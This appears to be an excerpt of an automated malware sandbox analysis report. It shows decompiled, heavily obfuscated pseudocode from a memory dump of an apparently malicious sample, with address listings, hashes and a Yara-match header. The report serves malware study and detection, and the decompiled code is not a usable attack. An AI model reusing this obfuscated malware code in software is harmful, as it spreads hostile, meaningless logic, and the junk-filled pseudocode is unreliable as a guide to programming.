									asm("sbb [0xfc08fba1], esp");
									asm("sbb dh, 0x18");
									asm("adc [0x3d021ba9], edx");
									 *0x6725431d =  *0x6725431d ^ _t104;
									_push(_t78);
									_t88 =  *0xa73b883a;
									_t84 = _t84 + 1;
									asm("adc eax, [0xa979ed5]");
									if(_t84 != 0) {
										asm("scasb");
										 *0x1621e34 =  *0x1621e34 >> 0x62;
										asm("adc bl, [0x64b3ad86]");
										_t97 =  *0xadbb6405;
										asm("ror byte [0xc89fd386], 0x68");
										if((_t88 & 0x00000000) != 0) {
											asm("adc edi, [0xdb362674]");
											asm("lodsd");
											_t86 = _t84 -  *0x28269116;
											_t78 = _t78 - 1;
											_push(_t78);
											asm("sbb [0x70c3fbf5], ebp");
											asm("rcr dword [0xaabc309a], 0x56");
											 *0x22ec1c2f =  *0x22ec1c2f - _t86;
											asm("cmpsw");
											asm("ror byte [0xc62de200], 0x9b");
											 *0x1b639525 =  *0x1b639525 ^ _t68;
											 *0xeea6ed67 =  *0xeea6ed67 >> 0x68;
											_t84 = _t86 ^  *0x1ca403ec;
											_push( *0xd953adc4);
											asm("sbb [0xd6b59bec], ebx");
											_pop(_t74);
											asm("movsw");
											 *0xadb909d2 =  *0xadb909d2 | _t88;
											_t68 = _t74 |  *0x5876a068;
											asm("adc ecx, [0xbef2efe]");
											 *0xe48e1fb0 =  *0xe48e1fb0 ^ _t88;
											_t92 =  *0xa77219d;
											_t97 = _t97 - 0x3e73a46d;
											if(_t97 >= 0) {
												_t97 = _t97 & 0x9d0b9672;
												 *0x4f57c95 =  *0x4f57c95 >> 0x5e;
												if( *0x4d0b74c7 >= _t104) {
													asm("ror dword [0x730e9672], 0x57");
													asm("adc [0x96aabe6c], eax");
													asm("ror byte [0xee470b2], 0xd7");
													 *0xe01a5b3c =  *0xe01a5b3c >> 0xd7;
													 *0x144e4412 =  *0x144e4412 << 0xd4;
													_t77 = _t78;
													 *0x2c6a426 =  *0x2c6a426 >> 0xfb;
													_pop(_t80);
													_push( *0x86d1c103);
													_t94 = _t94 |  *0xaabf8306;
													asm("sbb ebx, [0xa2b77e62]");
													 *0x3abcc95 = _t97;
													_t68 = _t77 |  *0xe0409d0d;
													_t88 =  *0x31167269 * 0x39b1;
													asm("ror dword [0x8067e531], 0xb2");
													_t104 = _t104 + 1;
													 *0x24ff31c5 = _t80 + 0xe4e6e109 ^  *0xe267f110;
													asm("movsw");
													 *0x746bfcc =  *0x3abcc95;
													asm("rol dword [0x9aedc17], 0xbf");
													asm("sbb [0x6a965c96], esi");
													_t97 =  *0x746bfcc - 1;
													_t84 = _t84 - 0x00000001 ^  *0xaef3b87;
													asm("sbb [0x65afcbf5], esi");
													_t78 =  *0x24ff31c5 -  *0x5ed1850d;
													if( *0x24ff31c5 -  *0x5ed1850d <= 0) {
														 *0xd25ff61f =  *0xd25ff61f ^ _t92;
														_t94 = ( *0x5b17667f * 0x0000869f |  *0x1574ced5) + 1;
														asm("adc eax, [0x23f0bb21]");
														_t97 = _t97 - 0x1b55a2dd;
														_t92 = _t92 ^  *0xf4e0fe03;
														asm("adc [0x1691aaf8], edx");
														if(_t92 >= 0) {
															_push(_t88);
															_t68 =  *0x9adfb3cb;
															_t104 = _t104 -  *0xedc62772 - 1;
															asm("sbb bh, 0x1c");
															_t84 = _t84 + 0x2a;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}


















                                                          0x0041b84a
                                                          0x0041b84f
                                                          0x0041b856
                                                          0x0041b85c
                                                          0x0041b85c
                                                          0x0041b85c
                                                          0x0041b862
                                                          0x0041b868
                                                          0x0041b86e
                                                          0x0041b874
                                                          0x0041b87a
                                                          0x0041b87b
                                                          0x0041b882
                                                          0x0041b888
                                                          0x0041b893
                                                          0x0041b89a
                                                          0x0041b8a0
                                                          0x0041b8a7
                                                          0x0041b8ac
                                                          0x0041b8b9
                                                          0x0041b8bf
                                                          0x0041b8c5
                                                          0x0041b8ca
                                                          0x0041b8cf
                                                          0x0041b8d4
                                                          0x0041b8d5
                                                          0x0041b8d6
                                                          0x0041b8dc
                                                          0x0041b8e2
                                                          0x0041b8ee
                                                          0x0041b8f4
                                                          0x0041b8f5
                                                          0x0041b903
                                                          0x0041b906
                                                          0x0041b90e
                                                          0x0041b91a
                                                          0x0041b91d
                                                          0x0041b91d
                                                          0x0041b91d
                                                          0x0041b923
                                                          0x0041b92a
                                                          0x0041b92c
                                                          0x0041b932
                                                          0x0041b93e
                                                          0x0041b944
                                                          0x0041b946
                                                          0x0041b94d
                                                          0x0041b94d
                                                          0x0041b953
                                                          0x0041b959
                                                          0x0041b95f
                                                          0x0041b960
                                                          0x0041b966
                                                          0x0041b96c
                                                          0x0041b96c
                                                          0x0041b97e
                                                          0x0041b984
                                                          0x0041b98a
                                                          0x0041b98a
                                                          0x0041b98a
                                                          0x0041b990
                                                          0x0041b992
                                                          0x0041b998
                                                          0x0041b99e
                                                          0x0041b9a5
                                                          0x0041b9ab
                                                          0x0041b9b6
                                                          0x0041b9c2
                                                          0x0041b9c8
                                                          0x0041b9ce
                                                          0x0041b9da
                                                          0x0041b9e1
                                                          0x0041b9e2
                                                          0x0041b9e5
                                                          0x0041b9ec
                                                          0x0041b9f3
                                                          0x0041b9f4
                                                          0x0041b9fa
                                                          0x0041b9fb
                                                          0x0041ba02
                                                          0x0041ba03
                                                          0x0041ba09
                                                          0x0041ba09
                                                          0x0041ba09
                                                          0x0041ba0f
                                                          0x0041ba16
                                                          0x0041ba1c
                                                          0x0041ba22
                                                          0x0041ba2c
                                                          0x0041ba32
                                                          0x0041ba38
                                                          0x0041ba3e
                                                          0x0041ba44
                                                          0x0041ba4e
                                                          0x0041ba54
                                                          0x0041ba55
                                                          0x0041ba5b
                                                          0x0041ba60
                                                          0x0041ba60
                                                          0x0041ba60
                                                          0x0041ba66
                                                          0x0041ba72
                                                          0x0041ba78
                                                          0x0041ba7a
                                                          0x0041ba80
                                                          0x0041ba86
                                                          0x0041ba90
                                                          0x0041ba96
                                                          0x0041ba9c
                                                          0x0041baa3
                                                          0x0041baa9
                                                          0x0041bab0
                                                          0x0041bab6
                                                          0x0041babf
                                                          0x0041bac5
                                                          0x0041bacb
                                                          0x0041bad1
                                                          0x0041bad7
                                                          0x0041badd
                                                          0x0041bae7
                                                          0x0041baed
                                                          0x0041baf7
                                                          0x0041bafd
                                                          0x0041bb03
                                                          0x0041bb0a
                                                          0x0041bb10
                                                          0x0041bb12
                                                          0x0041bb19
                                                          0x0041bb1f
                                                          0x0041bb2f
                                                          0x0041bb35
                                                          0x0041bb36
                                                          0x0041bb3c
                                                          0x0041bb3d
                                                          0x0041bb43
                                                          0x0041bb46
                                                          0x0041bb52
                                                          0x0041bb59
                                                          0x0041bb65
                                                          0x0041bb68
                                                          0x0041bb6e
                                                          0x0041bb6f
                                                          0x0041bb71
                                                          0x0041bb72
                                                          0x0041bb78
                                                          0x0041bb79
                                                          0x0041bb7b
                                                          0x0041bb88
                                                          0x0041bb8e
                                                          0x0041bb98
                                                          0x0041bb9d
                                                          0x0041bba3
                                                          0x0041bba9
                                                          0x0041bbb0
                                                          0x0041bbb3
                                                          0x0041bbb9
                                                          0x0041bbbf
                                                          0x0041bbc6
                                                          0x0041bbcc
                                                          0x0041bbd3
                                                          0x0041bbd4
                                                          0x0041bbd5
                                                          0x0041bbdb
                                                          0x0041bbe1
                                                          0x0041bbe6
                                                          0x0041bbec
                                                          0x0041bbec
                                                          0x0041bbec
                                                          0x0041bbf8
                                                          0x0041bc04
                                                          0x0041bc0b
                                                          0x0041bc17
                                                          0x0041bc1d
                                                          0x0041bc29
                                                          0x0041bc2f
                                                          0x0041bc35
                                                          0x0041bc3b
                                                          0x0041bc3b
                                                          0x0041bc3b
                                                          0x0041bc41
                                                          0x0041bc47
                                                          0x0041bc4e
                                                          0x0041bc54
                                                          0x0041bc5a
                                                          0x0041bc60
                                                          0x0041bc66
                                                          0x0041bc72
                                                          0x0041bc79
                                                          0x0041bc7f
                                                          0x0041bc80
                                                          0x0041bc81
                                                          0x0041bc88
                                                          0x0041bc8b
                                                          0x0041bc8e
                                                          0x0041bc94
                                                          0x0041bc9b
                                                          0x0041bca1
                                                          0x0041bca7
                                                          0x0041bcac
                                                          0x0041bcb2
                                                          0x0041bcb2
                                                          0x0041bcb2
                                                          0x0041bcb8
                                                          0x0041bcb9
                                                          0x0041bcc0
                                                          0x0041bcc6
                                                          0x0041bccc
                                                          0x0041bccc
                                                          0x0041bccc
                                                          0x0041bcd2
                                                          0x0041bcd8
                                                          0x0041bcde
                                                          0x0041bce5
                                                          0x0041bcf7
                                                          0x0041bd03
                                                          0x0041bd04
                                                          0x0041bd0b
                                                          0x0041bd15
                                                          0x0041bd1b
                                                          0x0041bd21
                                                          0x0041bd28
                                                          0x0041bd29
                                                          0x0041bd2f
                                                          0x0041bd35
                                                          0x0041bd3b
                                                          0x0041bd3b
                                                          0x0041bcd2
                                                          0x0041bcac
                                                          0x0041bc54
                                                          0x0041bbd5
                                                          0x0041bb88
                                                          0x0041bb19
                                                          0x0041bad7
                                                          0x0041ba80
                                                          0x0041ba3e
                                                          0x0041ba1c
                                                          0x0041b9c2
                                                          0x0041b998
                                                          0x0041b97e
                                                          0x0041b496
                                                          0x0041b496
                                                          0x0041b4a2
                                                          0x0041b4a3
                                                          0x0041b4a9
                                                          0x0041b4b0
                                                          0x0041b4b6
                                                          0x0041b4bd
                                                          0x0041b4c3
                                                          0x0041b4c9
                                                          0x0041b4d0
                                                          0x0041b4d9
                                                          0x0041b4da
                                                          0x0041b4e1
                                                          0x0041b4e7
                                                          0x0041b4ed
                                                          0x0041b4f8
                                                          0x0041b4fe
                                                          0x0041b504
                                                          0x0041b50b
                                                          0x0041b50b
                                                          0x0041b511
                                                          0x0041b518
                                                          0x0041b51e
                                                          0x0041b524
                                                          0x0041b52b
                                                          0x0041b531
                                                          0x0041b532
                                                          0x0041b539
                                                          0x0041b53a
                                                          0x0041b540
                                                          0x0041b546
                                                          0x0041b552
                                                          0x0041b558
                                                          0x0041b55e
                                                          0x0041b56a
                                                          0x0041b56b
                                                          0x0041b571
                                                          0x0041b572
                                                          0x0041b582
                                                          0x0041b58f
                                                          0x0041b595
                                                          0x0041b59b
                                                          0x0041b5a7
                                                          0x0041b5aa
                                                          0x0041b5b1
                                                          0x0041b5b7
                                                          0x0041b5b8
                                                          0x0041b5be
                                                          0x0041b5c5
                                                          0x0041b5ca
                                                          0x0041b5d0
                                                          0x0041b5d6
                                                          0x0041b5dc
                                                          0x0041b5e8
                                                          0x0041b5ee
                                                          0x0041b5fa
                                                          0x0041b600
                                                          0x0041b60a
                                                          0x0041b610
                                                          0x0041b61c
                                                          0x0041b622
                                                          0x0041b629
                                                          0x0041b63b
                                                          0x0041b63e
                                                          0x0041b644
                                                          0x0041b64a
                                                          0x0041b64b
                                                          0x0041b651
                                                          0x0041b652
                                                          0x0041b658
                                                          0x0041b664
                                                          0x0041b665
                                                          0x0041b66c
                                                          0x0041b672
                                                          0x0041b678
                                                          0x0041b682
                                                          0x0041b688
                                                          0x0041b694
                                                          0x0041b695
                                                          0x0041b69b
                                                          0x0041b69c
                                                          0x0041b69d
                                                          0x0041b6a3
                                                          0x0041b6aa
                                                          0x0041b6b0
                                                          0x0041b6b2
                                                          0x0041b6bf
                                                          0x0041b6c5
                                                          0x0041b6d8
                                                          0x0041b6de
                                                          0x0041b6e4
                                                          0x0041b6ea
                                                          0x0041b6eb
                                                          0x0041b6ed
                                                          0x0041b6f3
                                                          0x0041b6f9
                                                          0x0041b6ff
                                                          0x0041b705
                                                          0x0041b70b
                                                          0x0041b70c
                                                          0x0041b712
                                                          0x0041b718
                                                          0x0041b725
                                                          0x0041b72b
                                                          0x0041b739
                                                          0x0041b740
                                                          0x0041b747
                                                          0x0041b75d
                                                          0x0041b764
                                                          0x0041b765
                                                          0x0041b76c
                                                          0x0041b76d
                                                          0x0041b773
                                                          0x0041b785
                                                          0x0041b791
                                                          0x0041b797
                                                          0x0041b79d
                                                          0x0041b7b3
                                                          0x0041b7ba
                                                          0x0041b7bb
                                                          0x0041b7c1
                                                          0x0041b7c3
                                                          0x0041b7cf
                                                          0x0041b7d7
                                                          0x0041b7dd
                                                          0x0041b7de
                                                          0x0041b7e4
                                                          0x0041b7ea
                                                          0x0041b7f0
                                                          0x0041b800
                                                          0x0041b812
                                                          0x0041b813
                                                          0x0041b819
                                                          0x0041b81f
                                                          0x0041b825
                                                          0x0041b82b
                                                          0x0041b837
                                                          0x0041b838
                                                          0x0041b83d
                                                          0x0041b83e
                                                          0x0041b841
                                                          0x0041b841
                                                          0x0041b82b
                                                          0x0041b7f0
                                                          0x0041b725
                                                          0x0041b70c
                                                          0x0041b682
                                                          0x0041b658
                                                          0x0041b60a
                                                          0x0041b5fa
                                                          0x0041b572
                                                          0x0041b55e
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15c85136a5d4b211813c6dea80d8018c5974cebf40c9f6cfa3f5e5f3129b616a
                                                          • Instruction ID: cd847788b78cdbb76247970530b1cb8316a97df8c8fc172545e99c75c5c4d15e
                                                          • Opcode Fuzzy Hash: 15c85136a5d4b211813c6dea80d8018c5974cebf40c9f6cfa3f5e5f3129b616a
                                                          • Instruction Fuzzy Hash: 02227432808392CFE716CF38D89AB513FB6F756720B08439ED5A197092D7782566CF89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041BE0B, Relevance: .4, Instructions: 376COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0041BE0B() {
				signed int _t47;
				signed int _t48;
				signed int _t53;
				signed int _t56;
				void* _t63;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				signed char _t72;
				signed int _t74;
				signed int _t78;
				signed int _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				signed int _t87;
				signed int _t95;

				asm("sbb eax, 0x1ea21be9");
				_push(_t72);
				asm("sbb [0x4fbd19b0], dh");
				_push(_t86);
				 *0x8e04d114 =  *0x8e04d114 | _t72;
				asm("sbb [0xebe47898], ebp");
				_t79 = _t78 &  *0x2683c0b9;
				 *0x88d5e408 =  *0x88d5e408 & 0xf0fd78c1;
				 *0x3021b30a =  *0x3021b30a << 0xc;
				L1();
				 *0xc7af5b36 =  *0xc7af5b36 + 0xf0fd78c1;
				_t83 = _t81 + 2;
				_t68 = 0xbff97f0e;
				_t61 = (0xf0fd78c1 &  *0x4c6cd610) +  *0x8f1658b;
				asm("sbb eax, [0xd930a36e]");
				_t74 = _t72 +  *0xed2750e8 ^  *0xfe45113;
				 *0xa25e97f2 =  *0xa25e97f2 >> 0x1d;
				_t95 =  *0xe1d6476a * 0xba0a;
				 *0x356b8328 = 0xbff97f0e;
				_push(_t83);
				asm("sbb [0x2743350d], esi");
				if(_t95 > 0) {
					__edx =  *0x42ed277e * 0x650a;
					__esp = __esp +  *0xe4ccabcc;
					__ah -  *0x242d9f12 =  *0xcd7cae02 - __cl;
					__ebp = __ebp +  *0x418c8e0d;
					__ecx = __ecx + 1;
					__edi = __edi - 1;
					_pop(__esi);
					asm("sbb ecx, [0xd03b26d]");
					__ecx = __ecx + 0x6d64d4cf;
					__ebx = __ebx - 1;
					 *0xfdbdba19 =  *0xfdbdba19 | __esi;
					__eax -  *0xe4e5e13d =  *0x668cfa0f & 0xbff97f0e;
					 *0x5331d53b =  *0x5331d53b >> 0xb1;
					asm("movsb");
					_t31 = __ebx;
					__ebx =  *0x6b83288b;
					 *0x6b83288b = _t31;
					asm("ror dword [0xd5165635], 0x99");
					__esi = __esi +  *0x68626cf8;
					 *0x9f6621ff =  *0x9f6621ff << 0x48;
					__eflags = __dh - 0xb3;
					__esp = __esp -  *0xa6fe9c1;
					__ecx = __ecx + 1;
					__eax = __eax + 1;
					 *0x7d2b9f01 =  *0x7d2b9f01 >> 0xc9;
					__ecx = __ecx - 0x3c920fc8;
					 *0x486a502 =  *0x486a502 & __cl;
					asm("sbb [0x8d7c7823], esi");
					__cl = __cl &  *0x356b8328;
					_push(__esi);
					__ebp =  *0xdd0de20e;
					__eflags = __eax - 0xef506ea3;
					if(__eax == 0xef506ea3) {
						 *0xd930a37b =  *0xd930a37b & __esi;
						_push( *0xee45113);
						_push(__eax);
						__esp = 0xf864065;
						 *0xdc00ba1c =  *0xdc00ba1c >> 0x95;
						asm("rol byte [0x5113d930], 0x5a");
						asm("ror byte [0x8df70ee4], 0x11");
						 *0xd45473f8 =  *0xd45473f8 >> 0x1c;
						__eflags = 0x30c8460a;
						asm("sbb esi, [0xe45113d9]");
						__cl = __cl ^ 0x0000001a;
						__esp = 0xffffffffaf9fc7f7;
						__cl = __cl - 0xa0;
						__esp = 0xffffffffaf9fc7f7 -  *0xf9fe8131;
						__esp =  *0x4b510609;
						asm("ror dword [0xc44dde2f], 0x4f");
						__eflags = __ebx - 0x37866d94;
						asm("adc [0x21c02962], edx");
						__eflags =  *0x6be4b410 & __bl;
						__ebx = __ebx + 1;
						__eflags = __ebx;
						asm("sbb esi, [0x4281e507]");
						if(__ebx > 0) {
							 *0x36ee1676 = __ebx;
							_pop(__ebx);
							asm("scasd");
							__eax =  *0x1946c7;
							asm("movsw");
							__ebp = __ebp -  *0x85d74c89;
							__cl =  *0x469216c6;
							asm("ror dword [0x8df12c03], 0x48");
							 *0xee27dc37 =  *0xee27dc37 ^ __edx;
							__esi = __esi + 1;
							 *0xe0cfced5 =  *0xe0cfced5 | __esp;
							__eflags =  *0x1946c7 - 0x311713f5;
							_push(__edi);
							asm("adc bl, [0xf1221100]");
							__ecx = __ecx & 0x6121f985;
							_t36 = __edi;
							__edi =  *0x9b53f19;
							 *0x9b53f19 = _t36;
							asm("adc esp, [0xff2ed026]");
							asm("rcr byte [0x4fbd19b0], 0x24");
							_push(__ebp);
							__ebp = __ebp & 0x6ce93d17;
							 *0xb69ff6ee =  *0xb69ff6ee << 0x35;
							__esp = 0xd41d070e;
							asm("sbb dl, 0xe6");
							__esi = __esi |  *0xe9393c2b;
							_t37 = __ecx;
							__ecx =  *0x19b0023f;
							 *0x19b0023f = _t37;
							__eflags =  *0x13554fbd & __ebx;
							_push(0xd41d070e);
							if(( *0x13554fbd & __ebx) <= 0) {
								_pop( *0x46915377);
								__eflags = __esi & 0x8e28a7c4;
								asm("sbb ah, 0x22");
								asm("sbb ebx, [0xc48a6107]");
								__ebx =  *0xbeb499f0;
								 *0xe3e113a8 =  *0xe3e113a8 ^ __cl;
								__eflags =  *0xe3e113a8;
								if(__eflags <= 0) {
									_push( *0x64d22c77);
									if(__eflags < 0) {
										__ebx = __ebx | 0xa41eac73;
										asm("adc ah, 0x80");
										asm("adc eax, 0xf08d2dc0");
										asm("adc esp, [0xa8beb499]");
										_pop( *0x3284de0e);
										__eflags =  *0xab64bcb8 - __ecx;
										_push(0xd41d070e);
										__eflags = 0xd41d070e -  *0x13d9309f;
										_push(__ecx);
										__dh = __dh - 0xe4;
										__eax =  *0xc0210a0d;
										asm("rol dword [0x1b15add1], 0x2c");
										__esi = __esi - 1;
										asm("adc ecx, [0xe5e13dfd]");
										asm("rcl byte [0xb1fe11e4], 0x13");
										asm("rcr dword [0xa5080c8c], 0x3e");
										__ebp = __ebp -  *0x939b4d25;
										__eflags = 0xd41d070e - 0xf7155cd9;
										asm("lodsd");
										__ecx = __ecx & 0xc51a0cc1;
										__eflags = __ecx;
										if(__ecx != 0) {
											 *0x5176ac74 = __ecx;
											asm("adc cl, [0x528b9e6]");
											__eflags = __edi & 0x041d70db;
											_pop( *0x2c34ba3d);
											_t44 = __al;
											__al =  *0x373731c6;
											 *0x373731c6 = _t44;
											__ecx = 0x33bd81a3;
											__ebx = 0xbe160b3b;
											_pop(__edi);
											asm("rcr dword [0xaea703ed], 0x60");
											asm("adc ecx, [0xa1d3cd9]");
											__ebx = 0xffffffff9ec62a73;
											__esi = __esi - 0x48759adc;
											__esi = __esi - 1;
											 *0xc00b0e66 =  *0xc00b0e66 >> 0x83;
											__ah = __ah +  *0xb80b6bc9;
											_push(__edx);
											 *0x13d9309c = 0x33bd81a3;
											_push(0x33bd81a3);
											__eflags = 0xc9 -  *0x5bce16e4;
											__ecx = 0x33bd81a3 |  *0x25828501;
											 *0x4b6349ee =  *0x4b6349ee >> 0x61;
											asm("sbb dh, 0x86");
											asm("lodsd");
											 *0xaefbd7b9 =  *0xaefbd7b9 ^ __edx;
											__esi = __esi +  *0x7d2b9f01;
											__eflags = __esi;
											__ebx = 0xd3ec0dc8;
											asm("cmpsb");
											asm("stosd");
											asm("lodsb");
											if(__esi == 0) {
												__esp = __esp &  *0x2dc02875;
												__eflags =  *0xe4d2d70a - __bl;
												_push( *0xa3bea016);
												__ecx = 0x4742aeff;
												_push( *0x92aca697);
												asm("cmpsb");
												asm("lodsb");
												_t45 = __eax;
												__eax = __edx;
												__edx = _t45;
												__eflags =  *0x3c1580b9 - __ebp;
												__esi = __esi &  *0x9f013c2b;
												__eflags =  *0xbc87d2b & _t45;
												__esi = __esi & 0xc8118583;
												asm("rol byte [0xbd27c2a2], 0xba");
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t87 = _t86 |  *0x637c809;
				_push(_t74);
				_t48 = _t47 &  *0x4b550def;
				_push(_t48);
				 *0x6ab7e3b7 = _t74;
				 *0x600ce4f9 =  *0x600ce4f9 >> 0x1d;
				_t79 = _t79 +  *0xeb64decf;
				_t69 = _t68 -  *0x6ab9a5b2;
				asm("rol dword [0x870b336], 0x35");
				asm("rol dword [0xe44d3266], 0x10");
				_push(_t69);
				asm("rol dword [0x1d590531], 0xff");
				asm("adc [0xd9f46f6], bl");
				_t74 =  *0x6ab7e3b7 - 0xffffffffc64be17c;
				 *0x49d7d139 =  *0x49d7d139 | _t83;
				asm("sbb [0x574a13e4], ah");
				 *0xa2f85b12 = _t48 - 0x3454fd67;
				asm("sbb ah, [0x4d4445e2]");
				_t86 =  *0x9f8a858d;
				 *0x9f8a858d = _t87;
				asm("rol dword [0xa8c0ba9e], 0x1a");
				_t47 =  *0xa2f85b12 + 0x00000001 &  *0x3f407c10;
				asm("adc [0xdcfd40bf], ebx");
				asm("rcr byte [0x61d063e4], 0x6f");
				_t68 = _t69 &  *0x9fe4a5be;
				_t83 = _t83 + 1;
				 *0xdbd7fe0a =  *0xdbd7fe0a >> 0x51;
				asm("lodsd");
				asm("sbb [0xbb63f084], ah");
				 *0x8e096699 =  *0x8e096699 ^ _t95;
				if( *0x8e096699 <= 0) {
					_t79 = _t79 -  *0xeff1cec4;
					_t86 = _t86 ^ 0xbeea6505;
					if(_t86 != 0) {
						_pop(_t47);
						asm("adc bl, [0x9f061214]");
						asm("scasd");
						if(( *0xe10a9f74 & _t74) > 0) {
							 *0xef0f32f7 =  *0xef0f32f7 >> 0x2f;
							asm("adc edi, 0x9acac10f");
							_t83 = _t83 ^  *0x8e770e35;
							asm("rcr dword [0x53ce4a35], 0xb4");
							_t68 = _t68 | 0x00000012;
							 *0x356a7a91 =  *0x356a7a91 >> 0x8b;
							 *0xd54e9fde =  *0xd54e9fde & _t95;
							asm("stosb");
							asm("adc esp, [0x53c16b96]");
							 *0xaacca300 =  *0xaacca300 << 0xa6;
							_t74 = 0xb9c32b03;
							asm("sbb bl, [0xa9b9faa2]");
							_t61 =  *0xa66687e * 0x39f1 -  *0x4cc05705;
							 *0xfcd19325 =  *0xfcd19325 + _t68;
							 *0x17764bcf =  *0x17764bcf + _t47;
							_push( *0x1a3e9ec7);
							_t47 = 0x17623525;
							if( *0xaaf62fbc < 0xb9c32b03) {
								_t47 =  *0xcd1a597d * 0x4a0c;
								if(_t47 < 0) {
									_t86 = _t86 ^  *0x26ca4079;
									asm("sbb al, [0x4434ff32]");
									 *0x42cc7220 =  *0x42cc7220 << 8;
									asm("sbb [0xfc08fba1], esp");
									asm("sbb dh, 0x18");
									asm("adc [0x3d021ba9], edx");
									 *0x6725431d =  *0x6725431d ^ _t95;
									_push(_t61);
									_t74 =  *0xa73b883a;
									_t68 = _t68 + 1;
									asm("adc eax, [0xa979ed5]");
									if(_t68 != 0) {
										asm("scasb");
										 *0x1621e34 =  *0x1621e34 >> 0x62;
										asm("adc bl, [0x64b3ad86]");
										_t86 =  *0xadbb6405;
										asm("ror byte [0xc89fd386], 0x68");
										if((_t74 & 0x00000000) != 0) {
											asm("adc edi, [0xdb362674]");
											asm("lodsd");
											_t70 = _t68 -  *0x28269116;
											_t61 = _t61 - 1;
											_push(_t61);
											asm("sbb [0x70c3fbf5], ebp");
											asm("rcr dword [0xaabc309a], 0x56");
											 *0x22ec1c2f =  *0x22ec1c2f - _t70;
											asm("cmpsw");
											asm("ror byte [0xc62de200], 0x9b");
											 *0x1b639525 =  *0x1b639525 ^ _t47;
											 *0xeea6ed67 =  *0xeea6ed67 >> 0x68;
											_t68 = _t70 ^  *0x1ca403ec;
											_push( *0xd953adc4);
											asm("sbb [0xd6b59bec], ebx");
											_pop(_t53);
											asm("movsw");
											 *0xadb909d2 =  *0xadb909d2 | _t74;
											_t47 = _t53 |  *0x5876a068;
											asm("adc ecx, [0xbef2efe]");
											 *0xe48e1fb0 =  *0xe48e1fb0 ^ _t74;
											_t79 =  *0xa77219d;
											_t86 = _t86 - 0x3e73a46d;
											if(_t86 >= 0) {
												_t86 = _t86 & 0x9d0b9672;
												 *0x4f57c95 =  *0x4f57c95 >> 0x5e;
												if( *0x4d0b74c7 >= _t95) {
													asm("ror dword [0x730e9672], 0x57");
													asm("adc [0x96aabe6c], eax");
													asm("ror byte [0xee470b2], 0xd7");
													 *0xe01a5b3c =  *0xe01a5b3c >> 0xd7;
													 *0x144e4412 =  *0x144e4412 << 0xd4;
													_t56 = _t61;
													 *0x2c6a426 =  *0x2c6a426 >> 0xfb;
													_pop(_t63);
													_push( *0x86d1c103);
													_t83 = _t83 |  *0xaabf8306;
													asm("sbb ebx, [0xa2b77e62]");
													 *0x3abcc95 = _t86;
													_t47 = _t56 |  *0xe0409d0d;
													_t74 =  *0x31167269 * 0x39b1;
													asm("ror dword [0x8067e531], 0xb2");
													_t95 = _t95 + 1;
													 *0x24ff31c5 = _t63 + 0xe4e6e109 ^  *0xe267f110;
													asm("movsw");
													 *0x746bfcc =  *0x3abcc95;
													asm("rol dword [0x9aedc17], 0xbf");
													asm("sbb [0x6a965c96], esi");
													_t86 =  *0x746bfcc - 1;
													_t68 = _t68 - 0x00000001 ^  *0xaef3b87;
													asm("sbb [0x65afcbf5], esi");
													_t61 =  *0x24ff31c5 -  *0x5ed1850d;
													if( *0x24ff31c5 -  *0x5ed1850d <= 0) {
														 *0xd25ff61f =  *0xd25ff61f ^ _t79;
														_t83 = ( *0x5b17667f * 0x0000869f |  *0x1574ced5) + 1;
														asm("adc eax, [0x23f0bb21]");
														_t86 = _t86 - 0x1b55a2dd;
														_t79 = _t79 ^  *0xf4e0fe03;
														asm("adc [0x1691aaf8], edx");
														if(_t79 >= 0) {
															_push(_t74);
															_t47 =  *0x9adfb3cb;
															_t95 = _t95 -  *0xedc62772 - 1;
															asm("sbb bh, 0x1c");
															_t68 = _t68 + 0x2a;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}




















                                                          0x0041be0b
                                                          0x0041be1d
                                                          0x0041be34
                                                          0x0041be3a
                                                          0x0041be3b
                                                          0x0041be41
                                                          0x0041be47
                                                          0x0041be54
                                                          0x0041be60
                                                          0x0041be67
                                                          0x0041be72
                                                          0x0041be78
                                                          0x0041be79
                                                          0x0041be7e
                                                          0x0041be84
                                                          0x0041be8a
                                                          0x0041be90
                                                          0x0041be97
                                                          0x0041bea1
                                                          0x0041bea7
                                                          0x0041bea8
                                                          0x0041beae
                                                          0x0041beb4
                                                          0x0041bebe
                                                          0x0041beca
                                                          0x0041bed0
                                                          0x0041bed6
                                                          0x0041bed7
                                                          0x0041bed8
                                                          0x0041bedb
                                                          0x0041bee1
                                                          0x0041bee7
                                                          0x0041bee8
                                                          0x0041bef4
                                                          0x0041befa
                                                          0x0041bf01
                                                          0x0041bf03
                                                          0x0041bf03
                                                          0x0041bf03
                                                          0x0041bf09
                                                          0x0041bf10
                                                          0x0041bf16
                                                          0x0041bf1d
                                                          0x0041bf21
                                                          0x0041bf27
                                                          0x0041bf28
                                                          0x0041bf29
                                                          0x0041bf30
                                                          0x0041bf36
                                                          0x0041bf3c
                                                          0x0041bf42
                                                          0x0041bf48
                                                          0x0041bf49
                                                          0x0041bf4f
                                                          0x0041bf54
                                                          0x0041bf5a
                                                          0x0041bf60
                                                          0x0041bf66
                                                          0x0041bf67
                                                          0x0041bf6d
                                                          0x0041bf74
                                                          0x0041bf7b
                                                          0x0041bf82
                                                          0x0041bf89
                                                          0x0041bf8f
                                                          0x0041bf95
                                                          0x0041bf98
                                                          0x0041bf9e
                                                          0x0041bfa1
                                                          0x0041bfa7
                                                          0x0041bfad
                                                          0x0041bfb4
                                                          0x0041bfbc
                                                          0x0041bfc2
                                                          0x0041bfc8
                                                          0x0041bfc8
                                                          0x0041bfc9
                                                          0x0041bfcf
                                                          0x0041bfd5
                                                          0x0041bfdb
                                                          0x0041bfdc
                                                          0x0041bfdd
                                                          0x0041bfe2
                                                          0x0041bfe4
                                                          0x0041bfea
                                                          0x0041bff0
                                                          0x0041bff7
                                                          0x0041bffd
                                                          0x0041bffe
                                                          0x0041c004
                                                          0x0041c009
                                                          0x0041c00a
                                                          0x0041c010
                                                          0x0041c016
                                                          0x0041c016
                                                          0x0041c016
